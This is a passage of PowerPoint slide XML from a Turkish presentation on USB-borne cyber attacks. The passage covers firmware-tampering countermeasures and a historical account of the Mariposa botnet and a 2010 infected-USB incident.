            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çevresel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üreticileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bellenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>alanını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedefleyen</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>niyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahtecilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değişiklik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> vb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>önlemler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>almak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>acil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kabul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eğilimdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E2BEC3-2A67-4DA0-B3B9-D232D485A1BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9403620" y="2291815"/>
            <a:ext cx="1011803" cy="947415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Resim 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C25E3D-7C58-4596-9B3A-91381D2EE6CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448275" y="3366561"/>
            <a:ext cx="1018881" cy="940881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F98E6B-6B13-4531-90C2-06907EA18B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8455353" y="4656555"/>
            <a:ext cx="1011803" cy="1026539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Resim 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A2D41CF-2167-4B72-BD0F-983F3F625008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10266403" y="3366561"/>
            <a:ext cx="1011802" cy="1035332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Resim 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938B7DCD-82AC-45E2-8F60-66F7BA4C45C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10266403" y="4656555"/>
            <a:ext cx="1011803" cy="1006915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69908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B9709C-5523-45D4-AB41-59EB4882A00B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB İle Yapılan Önemli Siber Saldırılar ve Saldırıların Verimliliği</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5626115D-5099-4CF5-8C10-2C21F4B445E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="6790872" cy="4228536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mariposa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (2008)</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mariposa botnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dolandırıcılık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hizmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>reddi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>metodolojisidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Botnet, 12.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>milyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>benzersiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>adresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içeriyordu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Mariposa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>botnetinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkilenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> ABD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şirketi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, ilk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vektörünün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>endüstri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konferansında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paylaşılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücüsü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olabileceğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>keşfetti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>2010 ABD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Güvenlik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bakanlığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tavsiyesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>endüstri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konferansındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eğitmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eğitim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkinliğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öğrencilerle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paylaştı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Eğitime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>katılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hizmeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>virüslü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücüsünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dizüstü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>taktı</a:t>
            </a:r>
